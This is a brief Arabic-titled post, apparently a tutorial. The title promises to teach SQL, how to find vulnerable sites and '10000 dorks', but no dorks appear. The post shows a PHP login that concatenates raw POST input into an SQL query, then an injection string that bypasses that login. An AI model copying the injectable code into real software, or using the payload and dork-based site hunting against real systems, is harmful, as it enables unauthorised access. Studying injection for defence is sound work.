تعرف على sql وطرقة البحت عن المواقع المصابة و10000 دورك للبحت

<?$sql="SELECT * FROM users WHERE username=' " .$_POST['username'] . " '  AND password= ' " . $_POST['password'] . " ' " ; 

echo ' Query : '. $sql . ' 
' ; 
$result=mysql_query($sql) ; 
$rows=mysql_num_rows($result) ; 
if($rows > 0 )
{
    echo " You are logged in ! " ;
}
else
{
    echo " you are not allowed to log in here ! " ; 
}

?>
<form action="<?php echo $_SERVER['PHP_SELF'] ; ?> " method="post"><br/><input name="username"/><font color="#990000"> <br/><br/></font><input name="password"/><font color="#990000"> <br/><br/></font><input type="submit" value="Submit"/><br/></form>

' OR username LIKE '%

SELECT * FROM users WHERE username=' ' AND password= ' ' OR username LIKE '%'